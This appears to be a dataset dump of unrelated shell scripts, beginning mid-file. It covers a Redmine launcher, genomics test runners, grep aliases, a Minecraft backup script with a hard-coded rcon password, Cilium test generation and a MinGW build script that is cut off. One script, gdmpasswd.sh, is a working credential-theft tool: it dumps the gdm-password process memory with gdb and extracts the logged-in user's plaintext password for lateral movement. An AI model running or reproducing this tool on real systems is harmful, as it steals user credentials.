bold | dim | smul | rmul | rev | smso | rmso ) control=$1;;
*) printf "%s" "$1"; shift; continue;;
esac
shift
if [ -n "$control" ]; then
special=$(tput "$control")
elif [ -n "${code[*]}" ]; then
special=$(tput setaf "${code[$__colorbit]}")
fi
printf "\\[%s\\]" "$special"
done
}
__ps1() {
local prior_status=$?
__nodenv_ps1 "$(__color yellow)[%s] "
__rbenv_ps1 "$(__color red)[%s] "
__color cyan '\w' # CWD
__git_ps1 "$(__color base2) (%s $(git rev-parse --abbrev-ref '@{u}' 2>/dev/null))"
__color "$(if [ $prior_status -eq 0 ]; then echo base2; else echo red; fi)" "\\n\\$ "
__color reset
}
PROMPT_COMMAND='PS1=$(__ps1); '$PROMPT_COMMAND
| true |
446cf018220af22e2d12320468cf7d949e394e15 | Shell | TiagoZhang/docker-redmine | /redmine.sh | UTF-8 | 475 | 3.015625 | 3 | [] | no_license | #!/bin/bash
if [[ ! -e .env ]]; then
cp sample.env .env
fi
source .env
: ${RM_VERSION?"need to set redmine version RM_VERSION, see README.md"}
: ${RM_BRANCH=$RM_VERSION-stable}
: ${RM_DIR=$RM_BRANCH}
if [[ ! -v RAILS_ENV || "$RAILS_ENV" == development ]]; then
if [[ ! -e $RM_DIR/db/development.sqlite ]]; then
scripts/initialize.sh
fi
else
if [[ "$RAILS_ENV" == production && ! -e .production ]]; then
scripts/initialize.sh
fi
fi
scripts/redmine.sh
| true |
e669cd199040757e6556fd7fd8dc205679100ccb | Shell | mobidic/nenufaar | /tests/nenufaar_annot_test.sh | UTF-8 | 2,593 | 3.59375 | 4 | [] | no_license | #/bin/bash
USAGE="
sh tests/nenufaar_annot_test.sh -v version_number - launch from nenufaar folder
"
if [ "$#" -eq 0 ]; then
echo "${USAGE}"
echo "Error Message : No arguments provided"
echo ""
exit 1
fi
while [[ "$#" -gt 0 ]]
do
KEY="$1"
case "${KEY}" in
-v|--version) #mandatory
VERSION="$2"
shift
;;
-h|--help)
echo "${USAGE}"
exit 1
;;
*)
echo "Error Message : Unknown option ${KEY}" # unknown option
exit
;;
esac
shift
done
mkdir tests/logs/nenufaar_annot/${VERSION}/
mkdir tests/vcf/${VERSION}/
touch tests/logs/nenufaar_annot/${VERSION}/SUMMARY.log
bash nenufaar_annot.sh -i input/tests/MiniFastq_vcf/ -o tests/vcf/${VERSION}/ -a annovar -log tests/logs/nenufaar_annot/${VERSION}/${VERSION}.hg19.annovar.log -g hg19
STATUS=$?
if [ "${STATUS}" -eq 0 ];then
echo "Test annovar hg19 OK on ${HOSTNAME}" > tests/logs/nenufaar_annot/${VERSION}/SUMMARY.log
else
echo "Test annovar hg19 NOT OK on ${HOSTNAME} - check: tail -30 tests/logs/nenufaar_annot/${VERSION}/${VERSION}.hg19.annovar.log" > tests/logs/nenufaar_annot/${VERSION}/SUMMARY.log
fi
bash nenufaar_annot.sh -i input/tests/MiniFastq_vcf/ -o tests/vcf/${VERSION}/ -a annovar -log tests/logs/nenufaar_annot/${VERSION}/${VERSION}.hg38.annovar.log -g hg38
STATUS=$?
if [ "${STATUS}" -eq 0 ];then
echo "Test annovar hg38 OK on ${HOSTNAME}" >> tests/logs/nenufaar_annot/${VERSION}/SUMMARY.log
else
echo "Test annovar hg38 NOT OK on ${HOSTNAME} - check: tail -30 tests/logs/nenufaar_annot/${VERSION}/${VERSION}.hg38.annovar.log" > tests/logs/nenufaar_annot/${VERSION}/SUMMARY.log
fi
bash nenufaar_annot.sh -i input/tests/MiniFastq_vcf/ -o tests/vcf/${VERSION}/ -a annovar -f true -log tests/logs/nenufaar_annot/${VERSION}/${VERSION}.hg19.filtered.annovar.log -g hg19
STATUS=$?
if [ "${STATUS}" -eq 0 ];then
echo "Test annovar hg19-filtered OK on ${HOSTNAME}" >> tests/logs/nenufaar_annot/${VERSION}/SUMMARY.log
else
echo "Test annovar hg19-filtered NOT OK on ${HOSTNAME} - check: tail -30 tests/logs/nenufaar_annot/${VERSION}/${VERSION}.hg19.filtered.annovar.log" > tests/logs/nenufaar_annot/${VERSION}/SUMMARY.log
fi
bash nenufaar_annot.sh -i input/tests/MiniFastq_vcf/ -o tests/vcf/${VERSION}/ -a merge -log tests/logs/nenufaar_annot/${VERSION}/${VERSION}.hg19.merge.log -g hg19
STATUS=$?
if [ "${STATUS}" -eq 0 ];then
echo "Test merge hg19 OK on ${HOSTNAME}" >> tests/logs/nenufaar_annot/${VERSION}/SUMMARY.log
else
echo "Test merge hg19 NOT OK on ${HOSTNAME} - check: tail -30 test/logs/nenufaar_annot/${VERSION}/${VERSION}.hg19.merge.log" > tests/logs/nenufaar_annot/${VERSION}/SUMMARY.log
fi
exit
| true |
69847a0532df0131ec1674466c4b8e240e1caac4 | Shell | collielimabean/CS640-P5 | /part1Helpers/searchJSON.sh | UTF-8 | 291 | 3.4375 | 3 | [] | no_license | #!/bin/bash
if [ $# -eq 0 ]
then
echo "Usage: ./searchJSON <ip address> (optional)<verbose>"
exit
fi
ip=$1
verbose=$2
jq '.prefixes[] | select((.service=="EC2"))' < ip-ranges.json > tmp.txt
if [ $verbose ]
then
grep $ip -B 1 -A 3 tmp.txt
else
grep $ip tmp.txt
fi
rm tmp.txt
| true |
539be01b027879cb7b1041b9bef8f6c4d0208906 | Shell | bioe007/config-bash | /lib/grep.sh | UTF-8 | 457 | 3.203125 | 3 | [] | no_license | #!/bin/bash
OPTS="--color=always"
FILES=(
'*.o'
'*.pyc'
'tags'
'*.out'
'*.git'
'*.zip'
)
DIRS=(
'*.svn'
'*.git'
)
EXF=""
for f in "${FILES[@]}" ; do
EXF="--exclude=$f $EXF"
done
EXD=""
for f in "${DIRS[@]}" ; do
EXD="--exclude-dir=$f $EXD"
done
G_OPTS="$OPTS $EXF $EXD"
alias g="grep $G_OPTS"
alias gi="grep -i $G_OPTS"
alias gn="grep -n $G_OPTS"
alias gr="grep -r $G_OPTS"
alias gw="grep -w $G_OPTS"
| true |
a1c8feadc1dbcf2e152f1a8889490973ba6c5feb | Shell | HomeLabKB/KnowledgeBase | /Unsorted/Configuration/Minecraft/Files/backup.sh | UTF-8 | 330 | 2.84375 | 3 | [] | no_license | #!/bin/bash
function rcon {
/opt/minecraft/tools/mcrcon/mcrcon -H 127.0.0.1 -P 25575 -p test "$1"
}
rcon "save-off"
rcon "save-all"
tar -cvpzf /opt/minecraft/backups/server-$(date +%F_%R).tar.gz /opt/minecraft/server
rcon "save-on"
## Delete older backups
find /opt/minecraft/backups/ -type f -mtime +7 -name '*.gz' -delete
| true |
1a17a8d8e94c8834f28162d124fc0d7529c50121 | Shell | johnjohnsp1/gdmpasswd | /gdmpasswd.sh | UTF-8 | 1,445 | 3.484375 | 3 | [] | no_license | #!/bin/bash
# gdm3 3.26.2.1-3 (and possibly later) stores the credentials of the logged on user in plaintext in memory.
# Useful for lateral movement; we're on a box, but we don't yet have any credentials...
# This script requires root or privileged access to gdb/gcore/ptrace, etc.
cat << "EOF"
__ __
.-----.--| |.--------.-----.---.-.-----.-----.--.--.--.--| |
| _ | _ || | _ | _ |__ --|__ --| | | | _ |
|___ |_____||__|__|__| __|___._|_____|_____|________|_____|
|_____| @secure_mode |__|
EOF
# check ptrace_scope
ptrace_scope=$(cat /proc/sys/kernel/yama/ptrace_scope)
if [ "$ptrace_scope" -eq "3" ]; then
echo -e "\nUse of ptrace appears to be restricted due to /proc/sys/kernel/yama/ptrace_scope being set to $ptrace_scope. This won't work.";
exit 1;
fi
gdb=$(which gdb)
strings=$(which strings)
commands="commands.txt"
gdmpassword_pid=$(ps aux |grep 'gdm-password' |grep -v grep |awk '{print $2}')
$gdb -p $gdmpassword_pid -x $commands --batch-silent 2>/dev/null
$strings /tmp/core_file > /tmp/core_strings
account=$(grep 'HOME=' /tmp/core_strings |cut -f2 -d"/")
password=$(grep -E -C2 "myhostname|protocols" /tmp/core_strings |grep -v '\-\-')
echo -e 'USERNAME:' $account '\n\nPASSWORD CANDIDATES:\n'
echo $password\ | tr " " "\n"
rm /tmp/core_strings && rm /tmp/core_file
| true |
6306572f7366af12ed972c554b4925dd48aed5cb | Shell | yanyov/lxd-ansible | /playbooks/roles/elasticsearch/templates/elasticsearch-cron.j2 | UTF-8 | 695 | 3.71875 | 4 | [] | no_license | #!/bin/bash
set -o nounset
set -o errexit
set -o pipefail
# below code depend that we are in ElasticSearch log folder
cd /var/log/elasticsearch
# this will compare log files which are not yet for delete and the all the log files. The difference will be removed as it will show files older than {{ es_log_files_retention_days }}
log_files_to_delete=$(comm -13 <(for i in {01..{{ es_log_files_retention_days }}}; do echo {{ es_clustername }}.log.$(date -d "now - ${i}days" "+%Y-%m-%d")*; done | sort) <(ls -1 | grep {{ es_clustername }}.log.20 | sort))
if [ -z $log_files_to_delete ]; then
echo "no elasticsearch log files to delete. Exit"
exit 0
fi
echo $log_files_to_delete | xargs rm -v
| true |
e13219127d57ee8b43ac702310b6da8f7e37884d | Shell | mgrad/tinytools | /remove-col.sh | UTF-8 | 554 | 3.875 | 4 | [] | no_license | #!/bin/bash
function usage {
echo "usage: $0 file columns_list"
echo "example: ./$0 1 3 5 file"
echo "example: cat file | ./$0 1 3 5 - "
}
INPUTFILE=$(eval "echo \$$#")
length=$(($#-1))
array=${@:1:$length}
if [ ${#array[@]} -eq 0 ]; then usage ; exit 1; fi
# buf=$(cat $INPUTFILE)
## echo $buf
# exit
#if [ ! -e $INPUTFILE ]; then
# echo -e "ERROR: file $INPUTFILE not found\n";
# usage; exit 1;
#fi
COLS=""
for i in $array; do
COLS=$(echo -n $COLS\$$i=)
done
COLS="$COLS\"\""
eval "awk '{$COLS}1' $INPUTFILE" | column -t
| true |
6150c662ccfd8222adfabee4e3db4ba2fe7125a0 | Shell | GoogleCloudPlatform/gcsfuse | /perfmetrics/scripts/ml_tests/smart_log_deleter.sh | UTF-8 | 402 | 3.828125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Script for deleting older log files in the folder
# Usage: ./smart_log_deleter.sh $FOLDER_NAME
num_logs=`ls $1 | wc -w`
echo $num_logs
if [ $num_logs -lt 3 ]
then
exit 0
fi
logs_list=`ls -tr $1`
for log_file in $logs_list; do
num_logs=$(expr $num_logs - 1)
`rm -f $1/$log_file`
if [ $num_logs -lt 3 ]
then
exit 0
fi
done
| true |
affbb49adf73bed1b21c5cb8e2c18e3f32cc878c | Shell | cilium/cilium | /test/controlplane/services/graceful-termination/generate.sh | UTF-8 | 2,035 | 3.671875 | 4 | [
"Apache-2.0",
"BSD-3-Clause",
"GPL-1.0-or-later",
"GPL-2.0-only",
"BSD-2-Clause"
] | permissive | #!/usr/bin/env bash
#
# Generate the golden test files for the graceful termination test
#
# This generates the following files:
# init.yaml: The initial state of the cluster
# state1.yaml: Initial creation of the services and endpoints
# state2.yaml: Endpoint is set to terminating state
# state3.yaml: Endpoint has been removed
set -eux
dir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
. "${dir}/../../k8s_versions.sh"
export KUBECONFIG="${dir}/kubeconfig"
function get_state() {
kubectl get -n test services,endpointslices -o yaml
}
: Start a kind cluster with the EndpointSliceTerminatingCondition gate
kind create cluster --config "${dir}/manifests/kind-config-1.26.yaml" --name graceful-term
: Wait for service account to be created
until kubectl get serviceaccount/default; do
sleep 5
done
: Preloading images
kind load --name graceful-term docker-image "${cilium_container_repo}/${cilium_container_image}:${cilium_version}" || true
kind load --name graceful-term docker-image "${cilium_container_repo}/${cilium_operator_container_image}:${cilium_version}" || true || true
: Install cilium
cilium install --wait
: Dump the initial state
kubectl get nodes,ciliumnodes,services,endpointslices -o yaml > "${dir}/init.yaml"
: Apply the graceful-termination.yaml and dump the initial state
kubectl create namespace test
kubectl apply -f "${dir}/manifests/graceful-termination.yaml"
kubectl wait -n test --for=condition=ready --timeout=60s --all pods
get_state > "${dir}/state1.yaml"
: Stop the server
kubectl -n test delete pod -l app=graceful-term-server &
PID_DELETE=$!
: Wait for endpoint to become terminating and then dump it
kubectl wait -n test --timeout=60s \
-l kubernetes.io/service-name=graceful-term-svc \
endpointslices \
--for=jsonpath='{..endpoints..conditions.terminating}=true'
get_state > "${dir}/state2.yaml"
: Finish deletion and dump the final state
wait $PID_DELETE
get_state > "${dir}/state3.yaml"
: Tear down the cluster
kind delete clusters graceful-term
rm -f "${KUBECONFIG}"
| true |
38b4553b72efb2f70d8eefe8b2c52a633cb719e7 | Shell | deepikabartwal/shellScripts | /boxword.sh | UTF-8 | 154 | 2.703125 | 3 | [] | no_license | #! /bin/bash
input=$1
outlines=$(echo "| $input |" | tr "[:alnum:],[:space:]" "-" | tr "|" "+")
echo "$outlines"
echo "| $input |"
echo "$outlines"
| true |
fe46c767d4eec97277363f85f85abb5926180574 | Shell | tedle/uitabot | /scripts/test.sh | UTF-8 | 283 | 2.96875 | 3 | [
"ISC"
] | permissive | #!/bin/sh
exec 1>&2
cd `git rev-parse --show-toplevel`
(cd bot; pytest)
PYTEST_EXIT_CODE=$?
(cd web-client; npm run --silent test)
JSTEST_EXIT_CODE=$?
if [ $PYTEST_EXIT_CODE -ne 0 ] || [ $JSTEST_EXIT_CODE -ne 0 ]; then
exit 1
fi
echo All tests completed successfully
exit 0
| true |
8d349d2bb0d4f743bce5258bb93924150865d4d7 | Shell | vmlemon/eve | /pkg/pillar/scripts/generate-onboard.sh | UTF-8 | 484 | 3.578125 | 4 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | #!/bin/sh
#
# Copyright (c) 2018 Zededa, Inc.
# SPDX-License-Identifier: Apache-2.0
#
# Generate a self-signed ECC certificate; 7 day lifetime
# argument is a basename for the output files
# Example: generate-pc.sh ../run/test
# will place the private key in ../run/test.key.pem and the cert in
# ../run/test.cert.pem
if [ $# != 1 ]; then
myname=$(basename "$0")
echo "Usage: $myname <output basename>"
exit 1
fi
dir=$(dirname "$0")
"$dir"/generate-self-signed.sh 7 "$1"
| true |
55b9173dcc34eab0b173c3d33d20705549889dab | Shell | bridgecrew-perf7/DeepLearningDeployment | /tensorrt/cpp_deploy/scripts/test_time.sh | UTF-8 | 686 | 2.671875 | 3 | [] | no_license | #!/bin/bash
cd /content/DeepLearningDeployment/tensorrt/serialize_engine_from_onnx_cpp/bin
for MODEL in resnet50 resnet101 efficientnet-b4 efficientnet-b5 efficientnet-b6 efficientnet-b7
do
if [ -e /content/ONNX_MODELS/$MODEL.trt ]
then
echo "$MODEL.trt exists"
else
echo $MODEL
./trt_serialize /content/ONNX_MODELS/$MODEL.onnx /content/ONNX_MODELS/$MODEL.trt
fi
done
cd /content/DeepLearningDeployment/tensorrt/cpp_deploy/bin
for MODEL in resnet101 resnet50 efficientnet-b4 efficientnet-b5 efficientnet-b6 efficientnet-b7
do
echo $MODEL
./trt_inference /content/ONNX_MODELS/$MODEL.trt /content/DeepLearningDeployment/sample.jpg $1
done
| true |
6cb580657d84b9dd3bf00c3d938ef9ce7fde9f40 | Shell | RobinZweifel/Scripts122 | /scripts/beispielAufgaben/entscheidung2.sh | UTF-8 | 482 | 3.859375 | 4 | [] | no_license | #!/bin/bash
# Skript: entscheidung2.sh
# Aufruf: entscheidung2.sh dateiname1 dateiname2
if test $# -ne 2
then
echo "Sie müssen zwei Dateinamen als Argumente eingeben!"
echo "Usage: entscheidung.sh dateiname1 dateiname2"
else
if test -e $1
then
echo "Die Datei existiert"
else
echo "Die Datei \"$1\" existiert nicht"
exit 1
fi
if test -e $2
then
echo "Die Datei existiert"
else
echo "Die Datei \"$2\" existiert nicht"
exit 1
fi
fi
| true |
e04bc5c5fe9f7b767fe0642d3d929abcc42089a1 | Shell | DataShades/opswx-ckan-cookbook | /files/default/updateasg | UTF-8 | 7,228 | 4.03125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#
# This script snapshots the current instance volume, and updates the ASG from it
# ============== Script Parameters =======================
placement=$(wget -q -O - http://169.254.169.254/latest/meta-data/placement/availability-zone)
region=$(echo ${placement%?})
myid=$(wget -q -O - http://169.254.169.254/latest/meta-data/instance-id)
volume=$(aws ec2 describe-volumes --filters Name=attachment.instance-id,Values="${myid}" Name=attachment.device,Values='/dev/xvda' --region $region)
vol_id=$(echo ${volume} | jq '.Volumes[].VolumeId' | tr -d '"')
vol_size=$(echo ${volume} | jq '.Volumes[].Size' | tr -d '"')
instance=$(aws ec2 describe-instances --region $region --instance-ids $myid)
secgrps=$(echo ${instance} | jq '.Reservations[].Instances[].SecurityGroups[].GroupId' | tr -d '"')
instsize=$(echo ${instance} | jq '.Reservations[].Instances[].InstanceType' | tr -d '"')
keyname=$(echo ${instance} | jq '.Reservations[].Instances[].KeyName' | tr -d '"')
DATE=$(date +"%Y%m%d_%H%M")
Description="Automated GM snapshot of ${vol_id} "${DATE}
# ============== Function Definitions =======================
# Creates snapshot for new AMI
#
function create_snapshot
{
echo -ne "Creating snapshot of $vol_id"
snapid=$(aws ec2 create-snapshot --volume-id $vol_id --description "${Description}" --region $region | jq '.SnapshotId' | tr -d '"')
snapstatus='pending'
while [ $snapstatus = 'pending' ]; do
snapshot=$(aws ec2 describe-snapshots --snapshot-id ${snapid} --region $region)
snapstatus=$(echo $snapshot | jq '.Snapshots[0].State' | tr -d '"')
snappc=$(echo $snapshot | jq '.Snapshots[0].Progress' | tr -d '"')
bs=$(printf '%0.s\b' $(seq 1 ${#snappc}))
echo -ne ".${snappc}"
sleep 5
echo -ne "${bs}"
done
}
# Creates new AMI from snapshot, and new Launch config from generated AMI
#
function create_ami
{
echo -ne ".Creating AMI..."
ami=$(aws ec2 register-image --name "AUTO-WEB-GM_${DATE}" --root-device-name "/dev/sda1" --architecture "x86_64" --virtualization-type "hvm" --region $region --block-device-mappings "{\"DeviceName\": \"/dev/sda1\",\"Ebs\":{\"DeleteOnTermination\": true,\"VolumeType\":\"gp2\",\"VolumeSize\":${vol_size},\"SnapshotId\": \"${snapid}\"}}" | jq '.ImageId' | tr -d '"')
launchid=$(aws autoscaling create-launch-configuration --launch-configuration-name "AUTO-WEB-GM_${DATE}" --image-id ${ami} --instance-type ${instsize} --security-groups ${secgrps} --key-name ${keyname} --block-device-mappings "{\"DeviceName\": \"/dev/sda1\",\"Ebs\":{\"DeleteOnTermination\": true,\"VolumeType\":\"gp2\",\"VolumeSize\":${vol_size},\"SnapshotId\": \"$snapid\"}}" --region $region)
echo "Done."
}
# Updates selected ASG with new Launch config
#
function update_asg
{
aws autoscaling update-auto-scaling-group --auto-scaling-group-name ${asg} --launch-configuration-name AUTO-WEB-GM_${DATE} --region ${region}
echo "${asg} updated to 'AUTO-WEB-GM_${DATE}'"
}
# Checks the running state of an instance id
#
function get_instance_state
{
local istate=$(aws ec2 describe-instances --instance-ids $1 --region ${region} | jq '.Reservations[].Instances[].State.Name' | tr -d '"')
echo ${istate} | tr -d '\r\n'
}
function terminate_instance
{
local killid=$1
echo "Terminating old ASG instance ${killid}"
instate=$(get_instance_state ${killid})
if [ "${instate}" != "terminated" ]; then
echo "I didn't kill ${killid}"
fi
}
# ============== Script Body =======================
echo -e "Automated ASG Update\r\n"
if [ -z $vol_id ]; then
echo 'Unable to identify root volume'
exit 1;
fi
create_snapshot
create_ami
# Get a list of Autoscale Groups for user selectable update of launch config
#
asglist=$(aws autoscaling describe-auto-scaling-groups --region $region | jq '.AutoScalingGroups[].AutoScalingGroupName' | tr -d '"')
readarray asgs <<< "${asglist}"
counter=1
for asg in "${asgs[@]}"
do
asgname=$(echo ${asg} | tr -d '\n\r')
echo -e "[${counter}] ${asgname}"
(( counter++ ))
done
echo "Select AutoScaleGroup to update. [0] to exit: "
read asgopt
# Exit if user doesn't want to update any Autoscale Groups
#
if [ ${asgopt} -eq 0 ]; then
echo "Update ASG with Launch configuration 'AUTO-WEB-GM_${DATE}'"
exit 0;
fi
# Make sure user really wants to update the selected ASG
#
asg=$(echo ${asgs[ ${asgopt} - 1 ]} | tr -d '\n\r')
echo -ne "Update ${asg} with Launch configuration 'AUTO-WEB-GM_${DATE}'? Type 'yes' to proceed: "
read updateasg
if [ $updateasg != 'yes' ]; then
echo "Update ASG with Launch configuration 'AUTO-WEB-GM_${DATE}'"
exit 0
fi
update_asg
# Get info about the selected ASG so we can optionally churn out existing instances if any are running
#
asginfo=$(aws autoscaling describe-auto-scaling-groups --region $region --auto-scaling-group-name $asg)
asgdesired=$(echo $asginfo | jq '.AutoScalingGroups[0].DesiredCapacity' | tr -d '"')
# Exit if no instances to churn
#
if [ ${asgdesired} -lt 1 ]; then
echo "No web nodes in ${asg} to churn out."
exit 0
fi
# Check user wants to churn out existing instances in ASG
#
echo -ne "${asg} has ${asgdesired} instances to churn. Churn instances? Type 'yes' to proceed: "
read churnasg
# Bail if churn not desired
#
if [ ${churnasg} != 'yes' ]; then
echo "Churn ${asg} instances manually."
exit 0
fi
# Churn two instances at a time unless the ASG only has 2 instances
#
spawnqty=2
if [ ${asgdesired} -lt 2 ]; then
spawnqty=1
fi
# Work out whether maxsize accomodates the extra instances we'll start up for uninterupted churn.
#
required=$((${asgdesired} + ${spawnqty}))
# Get existing instance ids so we can monitor their termination
#
asginstids=$(echo ${asginfo} | jq '.AutoScalingGroups[0].Instances[].InstanceId' | tr -d '"')
echo "Adding ${spawnqty} more instances to ${asg}."
asgmaxsize=$(echo ${asginfo} | jq '.AutoScalingGroups[0].MaxSize' | tr -d '"')
maxsize=${asgmaxsize}
if [ ${asgmaxsize} -lt ${required} ]; then
maxsize=${required}
fi
aws autoscaling update-auto-scaling-group --auto-scaling-group-name ${asg} --max-size ${maxsize} --desired-capacity ${required}
sleep 10
# Wait for new instances to come online
#
curinsts=$(aws autoscaling describe-auto-scaling-groups --region $region --auto-scaling-group-name $asg | jq '.AutoScalingGroups[0].Instances[].InstanceId' | tr -d '"')
readarray ilist <<< "${curinsts}"
online=0
while [ ${online} -lt ${required} ]; do
for inst in "${ilist[@]}"; do
instid=$(echo $inst | tr -d '\n\r')
instate=$(get_instance_state ${instid})
if [ "${instate}" == "running" ]; then
(( online++ ))
fi
done
echo -ne "${online} of ${#ilist[@]} instances online\r\033[K"
done
# Terminate old instances one at a time accounting for a 5 minute cool-off period before the ASG adds another instance
#
readarray ilist <<< "${asginstids}"
for inst in "${ilist[@]}"; do
instid=$(echo $inst | tr -d '\n\r')
terminate_instance ${instid}
done
| true |
289c4cebc04cfeb3041ec6b207ab0842b8d13ac4 | Shell | severinmeyer/bachelor | /attachments/create-schemas.sh | UTF-8 | 912 | 3.703125 | 4 | [] | no_license | #!/bin/sh -e
# TASK
# Transform content/partNN/classNN.xml
# into content/partNN/catalogNN.xsd
# with stylesheets/transform.xsl
#
# NOTE
# Each specific catalogue schema uses a dedicated target
# namespace. However, it is not possible to dynamically
# create namespace attributes with XSLT [1, Section 7.6.2].
# As a workaround, the XSLT stylesheet embeds the string
# CONTENTPARTNUMBER, which is replaced with the part number
# after a schema is created.
#
# [1] James Clark: XSL Transformations (XSLT) Version 1.0,
# W3C Recommendation, 1999, http://www.w3.org/TR/1999/REC-xslt-19991116/
#
# DEPENDENCIES
# libxslt-tools <http://xmlsoft.org/XSLT.html>
for class in content/part*/class*.xml; do
part=$(echo "$class" | cut --characters 13-14)
schema="content/part$part/catalog$part.xsd"
xsltproc stylesheets/transform.xsl "$class" |\
sed "s/CONTENTPARTNUMBER/$part/g" > "$schema"
done
| true |
a8cd35474fc3a3446548bfbe1b61c5a4876e1ec0 | Shell | dabercro/WTagStudy | /docs/160705/figs/download.sh | UTF-8 | 476 | 3.21875 | 3 | [] | no_license | #!/bin/bash
dirs="old new small powheg herwig"
images="semilep_full_fatjetPrunedM.pdf semilep_full_fatjettau21.pdf"
for dir in $dirs
do
if [ ! -d $dir ]
then
mkdir $dir
fi
url=http://dabercro.web.cern.ch/dabercro/plots/16070
if [ "$dir" = "small" ]
then
url=$url\5/
else
url=$url\4_$dir/
fi
for image in $images
do
echo $url$image
wget $url$image
mv $image $dir/$image
done
done | true |
16a981e86ac8f92e36b7f3e28c36ec83b513366f | Shell | mcules/Zabbix-Wordpress-Template | /wp-upgrade-check.sh | UTF-8 | 1,264 | 4.25 | 4 | [] | no_license | #!/bin/bash
#
# Script will find all wordpress installs and check if they're out of date
#
# Using wp-cli - http://wp-cli.org/
# Paths to search for wordpresses. Separated by space.
PATHS="/var/www"
# Paths to ignore (should not be checked). End with semicolon ;
IGNOREPATHS="/var/www/path1;/var/www/path2/old/wordpress;"
WPCLI=/usr/local/bin/wp-cli
WORDPRESSES=$(find $PATHS -type d -name "wp-includes" -print)
# Loop through results
for WPATH in $WORDPRESSES; do
# Strip wp-includes from path
WPATH=$(dirname $WPATH)
# If folder is excluded, continue
if [ "${IGNOREPATHS/$WPATH;}" != "$IGNOREPATHS" ]; then
continue;
fi
# debug display path
#echo "$WPATH"
#continue;
# Get core update
WPUPDATE=$($WPCLI --allow-root --path=$WPATH core check-update | grep -P -m 1 "\d\.\d" | cut -f1)
if [ ! -z "$WPUPDATE" ]
then
WPUPDATE="core->$WPUPDATE"
fi
# Get plugin updates
while read -r line
do
WPUPDATE="$WPUPDATE plugin->$line"
done< <($WPCLI --allow-root --path=$WPATH plugin status | grep -P "^\sU" | cut -d" " -f3)
# Print output
if [ -z "$WPUPDATE" ]
then
echo "${WPATH:9} OK"
else
echo "${WPATH:9} $WPUPDATE"
fi
done
| true |
705b4a239b581b4051474fc9d2d25bf44ab06f10 | Shell | hinamae/shell | /no102set/no102 | UTF-8 | 641 | 3.4375 | 3 | [] | no_license | #!/bin/bash
#データのファイルの定義
datafile="$HOME/documents/unix_lessons/test/no102set/sample.dat"
#データファイルの存在チェック
if [ -f "$datafile" ]; then
#仕様変更で不要となったためコメントアウトしたものとする
#./myapp "$datafile"
#シェルスクリプトでは、からのif文はエラーとなってしまう
#if文のなかに少なくとも一つのコマンドが必要
#からのif文がかけないため、ヌルコマンド(:)を置いておく
:
else
#標準エラー出力で出力
echo "データファイルが存在しません: $datafile" >&2
exit 1
fi
| true |
92e22f14f8f86bb1d28b66df2281dc03261e67a2 | Shell | ljurk/dot | /bin/.bin/powermenu | UTF-8 | 1,498 | 3.578125 | 4 | [] | no_license | #!/usr/bin/env bash
theme="$HOME/.config/rofi/powermenu.rasi"
# CMDs
uptime="`uptime -p | sed -e 's/up //g'`"
# Options
shutdown=''
reboot=''
lock=''
suspend=''
logout=''
yes=''
no=''
# Rofi CMD
rofi_cmd() {
rofi -dmenu \
-p "Uptime: $uptime" \
-mesg "Uptime: $uptime" \
-theme ${theme}
}
# Confirmation CMD
confirm_cmd() {
rofi \
-theme-str 'mainbox {children: [ "message", "listview" ];}' \
-theme-str 'listview {columns: 2; lines: 1;}' \
-theme-str 'element-text {horizontal-align: 0.5;}' \
-theme-str 'textbox {horizontal-align: 0.5;}' \
-dmenu \
-p 'Confirmation' \
-mesg 'Sure?' \
-theme ${theme}
}
# Ask for confirmation
confirm_exit() {
echo -e "$yes\n$no" | confirm_cmd
}
# Pass variables to rofi dmenu
run_rofi() {
echo -e "$shutdown\n$reboot\n$lock\n$suspend\n$logout" | rofi_cmd
}
# Execute Command
run_cmd() {
selected="$(confirm_exit)"
if [[ "$selected" == "$yes" ]]; then
if [[ $1 == '--shutdown' ]]; then
systemctl poweroff
elif [[ $1 == '--reboot' ]]; then
systemctl reboot
elif [[ $1 == '--suspend' ]]; then
mpc -q pause
amixer set Master mute
systemctl suspend
elif [[ $1 == '--logout' ]]; then
i3-msg exit
fi
else
exit 0
fi
}
# Actions
chosen="$(run_rofi)"
case ${chosen} in
$shutdown)
run_cmd --shutdown
;;
$reboot)
run_cmd --reboot
;;
$lock)
i3lock
;;
$suspend)
run_cmd --suspend
;;
$logout)
run_cmd --logout
;;
esac
| true |
9f315d065849ad357e703fb0f08bd7f85b6854b2 | Shell | ilovezfs/gputils | /scripts/build/mingw/make-mingw | UTF-8 | 10,205 | 3.75 | 4 | [] | no_license | #!/bin/sh
# make-mingw - build the mingw binary distribution
# Copyright (C) 2002, 2003
# Craig Franklin
#
# This file is part of gputils.
#
# gputils is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# gputils is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with gputils; see the file COPYING. If not, write to
# the Free Software Foundation, 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
# This script has allot of extras which will probably never be used. It was
# originally intended to generate binaries for any OS, but that is unnecessary.
# The only binaries we are generating are for mingw or rpm. rpm is handled
# elsewhere, so this script only has to take care of mingw.
# Options for the system on which the package will run.
case $(uname) in
*MINGW*|*CYGWIN*)
TOOLSPREFIX="i686-pc-mingw32-"
MAKENSIS="c:/Program Files/NSIS/makensis"
;;
*)
TOOLSPREFIX="i686-w64-mingw32-"
MAKENSIS=makensis
;;
esac
test -z "${CC}" && CC="${TOOLSPREFIX}gcc"
test -z "${AR}" && AR="${TOOLSPREFIX}ar"
test -z "${RANLIB}" && RANLIB="${TOOLSPREFIX}ranlib"
test -z "${STRIP}" && STRIP="${TOOLSPREFIX}strip"
test -z "$CFLAGS" && CFLAGS="-s -O2"
distname="mingw32"
host=i386-mingw32msvc
if expr "$(unix2dos -q < /dev/null 2>&1)" : '.*-q: unknown option' >/dev/null
then
UNIX2DOS="unix2dos"
else
UNIX2DOS="unix2dos -q"
fi
# autoconf can't test cross compilers, so set the variables in the configure
# command line.
config_options="ac_cv_func_malloc_0_nonnull=yes \
ac_cv_func_realloc_0_nonnull=yes"
doc="gputils.pdf"
comments="None. "
delete_dir="lib man include"
common="AUTHORS COPYING ChangeLog NEWS README"
use_zip=yes
clean=yes
